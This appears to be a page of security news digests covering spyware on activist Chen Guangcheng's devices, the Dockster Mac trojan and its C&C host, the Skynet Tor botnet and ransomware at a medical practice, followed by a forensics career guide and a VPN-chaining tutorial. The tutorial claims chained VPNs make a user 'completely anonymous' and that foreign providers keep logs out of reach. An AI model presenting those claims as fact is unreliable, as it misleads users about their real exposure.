Spying Software Found on Chinese Devices

According to Reuters, several pieces of spying software have been identified on several devices owned by Chen, including an iPhone and an iPad he had received shortly after his arrival to the US from the wife of activist Bob Fu, the man who runs the Christian group called ChinaAid. 

After fleeing to the US last year in May, Chinese activist Chen Guangcheng was given a fellowship at the New York University. Now that the period of his fellowship has come to an end, some interesting aspects of the story have come to light.
 
The presence of the spyware has been brought to light by NYU professor Jerome Cohen and another individual familiar with the incident.
While some say that the devices were plagued with spy software right from the start, others point the finger at the NYU for installing the applications.
Among the spy applications, technicians found one that secretly turned the devices into a tracking system, and a password-protected program that uploaded data to a remote server.

Read more

Facebook Issue May Have Leaked Your Email and Phone Number

Facebook just published a data breach notification on its security blog.
You might not immediately notice that from the title of the article, which announces itself as an "Important Message from Facebook's White Hat Program."
 The cloud (bad pun intended) is that Facebook's systems made the fault possible in the first place.

What Facebook seems to be admitting to, in Friday's breach notification message, is that it was careless with the aggregated data accumulated from contact list uploads.
The problem, says Facebook, lay in its Download Your Information (DYI) feature, which exists so you can suck down everything you've previously entrusted to the social networking giant.

 DYI improves availability, because it allows you to make your own off-site backup of everything you've stored on Facebook. It improves transparency, because it acts as a record of everything you've uploaded to Facebook over the years.But there was a bug in DYI, of the data leakage/unauthorised disclosure sort.
Apparently, DYI was capable of letting you download more than you'd uploaded in the first place.




 

Read more

U.S. is Spying on China,Stealing ‘Millions’ of Texts : Edward Snowden

Former NSA contractor Edward Snowden revealed on Saturday that the U.S. is tapping into Chinese mobile carriers to access customers’ text messages.
It’s not just a few messages, either. Snowden told the South China Morning Post that millions of Chinese text messages are being harvested by the U.S.

“China should set up a national information security review commission as soon as possible,” Snowden told the paper.
Chinese mobile users sent over 900 billion text messages in 2012, according to government statistics, so if Snowden’s claims are true, the United States’ surveillance isn’t too extensive in the grand scheme of things. (Chinese officials likely won’t see the situation in that light though.)

The reveal will make an already rocky relationship between the U.S. and China even more tumultuous. President Obama and China’s new president Xi Jinping have already had several conversations about cybersecurity relations, and both leaders are also kicking off a series of regular talks between the two countries.

Read more

Russian Hackers Break Into Australian Medical Center Data, Demand $4,000 Ransom

Australia medical practice has been held to ransom by a group of Russian hackers. The hackers encrypted the practice’s patient database, rendering it unusable until decrypted.

Hackers are demanding a ransom of $4,000 to decrypt the sensitive information held on a server at the Miami Family Medical Centre,noting that scammers tend to go for a low-yield, high-volume approach to increase their chances of a payout.


The practice in question is Miami Family Medical Centre, whose co-owner David Wood believed that anti-virus software was enough of a protection against intrusion and other security threats.
Cases like this should serve as a wake-up call for businesses to get proper security advice from professionals — particularly those responsible for sensitive medical information. When you deal with information like this, ignorance is not an excuse.

An IT firm has been called in to try to recover the information from backups. After analyzing the encryption system, experts have concluded that – although it’s not recommended – the only solution to recover the encrypted data might be to pay the ransom.
In the meantime, the Miami Family Medical Centre continues to operate, but the task is not easy without patient records.

Read more

Skynet Botnet Command and Control Servers Controlled Over Tor

Security researchers have identified a botnet controlled by its creators over the Tor anonymity network. It's likely that other botnet operators will adopt this approach.

The botnet is called Skynet and can be used to launch DDoS (distributed denial-of-service) attacks, generate Bitcoins -- a type of virtual currency -- using the processing power of graphics cards installed in infected computers, download and execute arbitrary files or steal login credentials for websites, including online banking ones.

However, what really makes this botnet stand out is that its command and control (C&C) servers are only accessible from within the Tor anonymity network using the Tor Hidden Service protocol.
Tor hidden services are most commonly Web servers, but can also be Internet Relay Chat (IRC), Secure Shell (SSH) and other types of servers. These services can only be accessed from inside the Tor network through a random-looking hostname that ends in the .onion pseudo-top-level domain.

The Hidden Service protocol was designed to hide the IP (Internet Protocol) address of the clients from the service and the IP address of the service from the clients, making it almost impossible for the parties involved to determine each other's physical location or real identity. Like all traffic passing through the Tor network, the traffic between a Tor client and a Tor hidden service is encrypted and is randomly routed through a series of other computers acting as Tor relays.

As far as I understand, there is no technical way neither to trace and definitely neither to take down the Hidden Services used for C&C.

Read more

Microsoft ERP hack

Security researchers have presented proof-of-concept code capable of accessing the database driving a Microsoft ERP system and then diverting funds while avoiding immediate detection.
Tom Eston and Brett Kimmel of vendor SecureState presented the would-be malware this week at the Black Hat Abu Dhabi conference.

For hackers seeking big money, infiltrating an enterprise resource planning system would be like hitting the jackpot. Once inside, cybercriminals would have access to financial software, as well as applications driving business operations.

Makers of corporate enterprise resource planning (ERP) systems include Oracle and SAP, while Microsoft's Dynamics Great Plains software is for midsize businesses.

Hacking Great Plans, or any other ERP system, requires more than just technical expertise.An accountant would also be needed to make sense of the information in the database and to manipulate accounts in a way to avoid immediate detection.

Project Mayhem included tech experts and a certified public accountant. "It's that blending of unique knowledge that facilities the ability to find [where to] attack.

Read more

Dockster: New Mac Trojan OSX/Dockster Targets gyalwarinpoche.com Website Related To Dalai Lama

A website related to the Dalai Lama is hosting attack code that attempts to surreptitiously install OS X-based spy software on the Macs of people who visit.

This malware is now known to be in the wild and the remote address contacted by the backdoor is now active. The Java-based exploit uses the same vulnerability as "Flashback", CVE-2012-0507. Current versions of Mac OS X and those with their browser's Java plugin disabled should be safe from the exploit. The malware dropped, Backdoor:OSX/Dockster.A, is a basic backdoor with file download and keylogger capabilities.

If it’s executed, the trojan deletes itself from the location where it was run and installs itself in the user’s home directory with the filename .Dockset. The file is not visible through Finder; however, if it’s running, it can be seen within OS X’s Activity Monitor.  It creates a launch agent called mac.Dockset.deman so that the trojan will restart each time an affected user logs in. Once the trojan is active, it tries to contact the remote address itsec.eicp.net to await instructions. At the time of writing, this address is not registered, which indicates the sample may be intended simply as a test rather than an active threat.

 In the case of Flashback, which was also discovered by Intego, reported 600,000 Macs were affected before both Apple and Oracle released a Java patches to remove the malware and protect against future attacks.

Although the newly-found Dockster takes advantage of an already fixed weakness, users who haven't yet updated their Macs or are running older software may still be at risk.

Read more

Tumblr Suffering From a Viral Hack

Tumblr seems to be suffering from a viral hack at the moment, as several blogs appeared to have been compromised and are now displaying a message from the notorious troll organization GNAA.
The problem seems to be with Tumblr, which has acknowledged it, so account credentials probably haven’t been compromised.

“There is a viral post circulating on Tumblr which begins ‘Dearest ‘Tumblr’ users.’ If you have viewed this post, please log out of all browsers that may be using Tumblr immediately. Our engineers are working to resolve the issue as swiftly as possible,” Tumblr explained.

A coding tag contained in the post linked to malicious code on another website. The JavaScript exploit, which was included in an iframe tag that pointed to an outside website, used what is known as base-64 encoding. It's a technique that uses printable ASCII characters to represent large chunks of binary data and has the benefit of making it harder to know exactly how a script will behave when executed.

There’s no way to know how many blogs have been affected so far and the only way to avoid your blog being taken over is to not use Tumblr and log out of your account. Not the greatest of fixes, but it’s all that works for now.

The exploit through which all of this was accomplished is unknown for now, the speculation is that the hackers were able to use a bug in Tumblr’s embedding system and get their scripts to run from there.

The malicious posting can be easily removed from infected accounts using the Tumblr mass editor. The site also recommends affected users change their account password, a measure that's probably not necessary, but wise considering Tumblr researchers have yet to offer a complete analysis of the attack.

Read more

Trading Forex Website Targeted

A FOREX trading website called "Trading Forex," located at hxxp://tradingforex.com has been contaminated with a malicious Java applet that is designed to install malware on the systems of visiting surfers. 

FOREX is the foreign exchange market where international currencies are traded, and nowadays, it's used by millions of people around the world. 

The backdoor planted on Trading Forex is written in Visual Basic.Net and requires the Microsoft's .NET framework to be successfully installed and running on a victim's computer. This is an unusual approach.

Hackers intent on distributing malware through compromised websites often use pre-packaged tools, available through underground forums, most notably the widely used Blackhole Exploit kit.

Read more

Rise Of The Machines : Human Judgment Required

As custom government malware becomes an increasingly common international weapon with real-world effects—breaking a centrifuge, shutting down a power grid, scrambling control systems—do we need legal limits on the automated decision-making of worms and rootkits? Do we, that is, need to keep a human in charge of their spread, or of when they attack? According to the US government, no we do not.

A recently issued Department of Defense directive signed by Deputy Secretary of Defense Ashton Carter sets military policy for the design and use of autonomous weapons systems in combat. The directive is intended to minimize "unintended engagements"—weapons systems attacking targets other than enemy forces, or weapon systems causing collateral damage. But the directive specifically exempts autonomous cyber weapons.

Most weapon systems, the policy states, "shall be designed to allow commanders and operators to exercise appropriate levels of human judgment over the use of force," regardless of whether the system is using lethal "kinetic" weapons or some form of non-lethal force. If bullets, rockets, or missiles are to be fired, tear gas is to be launched, or systems are to be jammed, a human needs to make the final decision on when they are used and at whom they are aimed.

Read more

How To Become a Computer Forensics Expert

What a Computer Forensics Investigator needs to understand

A Computer Forensics Investigator needs to be able to understand the process of investigating a cybercrime, the laws involved and the details in obtaining the necessary authorisation to perform the investigation.

Each computer forensics case is different, and each country’s laws are different too. Most difficult of all: attacks are becoming more elaborate every day.

The Computer Forensics Investigator must have the necessary information technology and security skills, to be able to deal with these different situations.

The examination process – and the many different types of digital evidence - makes computer forensics a time-consuming process. So a Computer Forensics Investigator must also have the necessary skills to manage projects and resources.
 
First things first: the First Responder

The most important function of a computer forensics investigator starts with the First Responder. Roles of the First Responder include: securing, evaluating and documenting the electronic crime scene; conducting preliminary interviews; collecting, preserving, packaging and transporting electronic evidence; and finally reporting the crime.
 
The role of the Computer Forensics Investigator

Below are a few actions required of the Investigator:
•         Recover deleted files and deleted partitions in Windows, Mac OS X, and Linux
•         Crack passwords, understand password-cracking processes and have access to password-cracking tools
•         Understand types of password attacks and how to investigate a password-protected file breach
•         Understand different types of log capturing techniques, log management, log capturing tools and time synchronisation
•         Investigate logs, network traffic, wireless attacks, and web attacks
•         Track e-mails and investigate e-mail crimes.
 
How does computer forensics fit within the ethical hacking world?

Ethical hacking is a function of computer forensics. Ethical hacking is the process that follows vulnerability assessments and scanning. Ethical hacking is the art of exploitation with permission - and thus is a mandatory skill and requirement within the computer forensics world.

When a computer forensics investigator is tasked with the collection, examination, identification, preservation, recovery, analysis and presentation of evidence as facts; ethical hacking is the fundamental skill to achieve these effectively.
 
Computer forensics certifications

There are several computer forensics certs to choose from. These are the best:
·         C|HFIv8 - Computer Hacking Forensics Investigatorfrom the EC-Council
·         GCFE - Forensics Examinerfrom the GIAC (SANS)
·         CCFE - Certified Computer Forensics Examinerfrom the IACRB
·         CCE - Certified Computer Examinerfrom the ISFCE

Read more

Anonymity

A VPN allows you to connect to a remote network, and over all ports, encrypt and forward your traffic. This also changes your IP address. Chaining VPNs is a tricky task, though there is a simple and uncommon method I know of. Using multiple VPNs together has the huge perk of being completely anonymous.

How To Chain VPNs

First, a person would connect to the VPN. Then, when connected to the first VPN, you chain to the second, and since a bunch of people share the same IP, the second VPN has no way of knowing who tunnelled to it. An even better scenario is where you use an eastern VPN as your first, because our country has no jurisdiction to retrieve the logs from them, thus increasing your security.
However, to chain VPNs, the second VPN would need to know how the first VPN’s traffic was encrypted. This flaw makes it impossible to chain them in this method, unless you own both VPNs (not very likely).
So, how can we chain VPNs then? I’ll show you how by using a virtual machine!

Requirements

• Windows, Mac or Linux OS
• Admin/root privileges
• OpenVPN
• VirtualBox
• 2 VPNs (there are tons of free ones that you can find with google search)

Step 1 Install OpenVPN & a VirtualBox Computer

Text in bold is a terminal command.
First, we need to install the VPN client for Linux users. Windows users can download the program here and here, and run the installer normally. Mac users can use this GUI for OpenVPN for Mac.

1. Change to the Downloads directory.
2. Configure the installation.
   ./configure
3. Compile and install.
   make && sudo make install
4. Now we need to install VirtualBox. This will allow us to have a virtual operating systems running from within our computer. Download VirtualBox: Windows, Mac, Linux.
5. Install a virtual machine of your choice for Windows or Linux and Mac, then install OpenVPN to it.

Step 2 Chain the VPNs

Start up your virtual machine, and configure them both.

1. For Windows users using the default VPN .
2. Connect to VPN A with your host OS.
3. Start up your virtual machine of choice, and connect to VPN B with it.
4. Operate from within your virtual machine, and you will be safe from prying eyes. If you need to delete the virtual machine, make sure you securely delete it, and your information will be safe.

Read more